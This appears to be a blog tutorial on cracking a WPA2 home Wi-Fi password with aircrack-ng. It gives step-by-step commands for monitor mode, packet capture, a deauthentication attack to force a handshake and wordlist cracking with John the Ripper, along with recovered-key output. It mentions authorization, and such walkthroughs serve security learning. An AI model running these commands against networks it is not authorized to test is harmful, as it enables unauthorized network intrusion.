If you want to read up on virtual consoles, see my post linked in this sentence.
tl;dr is posted at the bottom (for those of you just wanting the commands)
Now the fun stuff:
ONE: Find your wireless interface
airmon-ng
This will display available interfaces capable of monitoring mode
TWO: Put it into “monitoring” mode
airomon-ng start wlan0
If you get a warning about programs potentially interfering, all I can suggest is try the next step first. If the next step fails try killing the listed processes. Personally, I used Virtual Terminals 1-3 and killed everything with prejudice. You don’t have to do this, it just made me feel cool.
My monitoring interface was named wlan0mon.
THREE: Monitor to grab a BSSID and channel.
airodump-ng wlan0mon
You’ll see some output like this:
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 24:A0:55:72:22:46 -56 1154 2971 0 9 54e WPA2 CCMP PSK haxor_me 20:22:20:F2:FA:EE -76 712 75 0 6 54e WPA2 CCMP PSK prettyflyforawifi
My home network is pentest_me, with a BSSID of 24:A0:55:72:22:46
Please make sure this is your intended and authorized target.
FOUR: Start capturing
airodump-ng -c 9 --bssid 24:A0:55:72:22:46 -w ~/wireless/haxor_me wlan0mon
Broken down: airodump-ng -c CHANNEL –bssid BSSID -w FOLDER_TO_WRITE_TO INTERFACE
You will get a screen that looks something like this:
CH 6 ][ Elapsed: 6 mins ][ 2015-11-27 00:28 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 24:A0:55:72:22:46 -74 100 3154 292 0 9 54e WPA2 CCMP PSK haxor_me BSSID STATION PWR Rate Lost Frames Probe 24:A0:55:72:22:46 88:63:D1:C4:11:D2 -1 1e- 0 0 7
This should create four files. Don’t exit this screen! This needs to keep running to grow your capture. Those files you will run aircrack-ng on, but first you need to:
FIVE: Capture an authentication handshake.
aireplay-ng –0 1 –a 24:A0:55:72:22:46 –c 88:63:D1:C4:11:D2 wlan0mon
Broken down: -0 means deauth, the number following is how many deauth packets to send to the client. I only need one handshake, so I chose one.
-a is for the routers bssid. This is the same bssid as the one you used with airodump-ng
-c is for the client bssid. You will see client bssids show up in the terminal/window that you are running your capture on.
In the capturing window, clients (or stations) show up in the bottom portion of the window. You want the MAC address from the STATION column.
Once you send the deauth (or you can wait patiently for someone to connect normally), you should hopefully see this in the top right corner of your capture window:
CH 6 ][ Elapsed: 16 mins ][ 2015-11-27 00:39 ] [ WPA Handshake: A8:24:45:C8:08:54
That WPA Handshake bit is what youre looking for. As soon as you get that you can shut down the capture and start cracking.
SIX: Get cracking!
aircrack-ng -a2 -b 24:A0:55:72:22:46 -w /usr/share/wordlists/rockyou.txt ~/wireless/haxor_me/*.cap
Broken down:
-a
Force the attack mode, 1 or wep for WEP and 2 or wpa for WPA-PSK.
-b
Select the target network based on the access point MAC address.
-w
Path to a dictionary file for wpa cracking. Specify “-” to use stdin.
In the command I ran, it will run down the rockyou wordlist included in Kali, and then stop.
That’s all fun and games, but what if we want to do some word-mangling? Well that line that says ‘Specify “-” to use stdin’ looks like it might pair nicely with this tidbit from the John the Ripper man pages:
-stdout[:LENGTH]
When used with a cracking mode, except for “single crack”, makes John print the words it generates to stdout instead of cracking.
While applying wordlist rules, the significant password length is assumed to be LENGTH, or unlimited by default.
To put those together:
john --wordlist=/usr/share/rockyou.txt --rules=Single --stdout | aircrack-ng -a2 -b 24:A0:55:72:22:46 -w - ~/wireless/haxor_me/*.cap
Yay haxing!
Aircrack-ng 1.2 rc2 [00:00:00] 1600 keys tested (4345.17 k/s) KEY FOUND! [ snakepit1 ] Master Key : E2 CA 4E ED 27 69 4E EE 2C 50 D1 AD AE 02 9D 89 4F 3A 39 38 DA 87 72 0E 7E 40 CA 5C F4 32 B7 67 Transient Key : 42 A0 1F EE 85 AC 06 64 08 57 22 7D 6B 42 0B 46 0C F5 FD 91 0F 8C A8 02 E7 85 8C 66 25 FF 66 77 A6 E7 C7 7A 73 75 3F E0 82 45 57 FA 5F CB 37 9F E7 7C AA 47 F6 4D A2 33 75 77 A4 EA D4 9A EE 01 EAPOL HMAC : A1 24 41 C2 08 22 23 A7 E2 F0 C4 1C 11 46 21 C1
tl;dr
airomon-ng start wlan0
airodump-ng wlan0mon
airodump-ng -c 9 --bssid 24:A0:55:72:22:46 -w ~/wireless/haxor_me wlan0mon
aireplay-ng –0 1 –a 24:A0:55:72:22:46 –c 88:63:D1:C4:11:D2 wlan0mon
aircrack-ng -a2 -b 24:A0:55:72:22:46 -w /usr/share/wordlists/rockyou.txt ~/wireless/haxor_me/*.cap
john --wordlist=/usr/share/rockyou.txt --rules=Single --stdout | aircrack-ng -a2 -b 24:A0:55:72:22:46 -w - ~/wireless/haxor_me/*.cap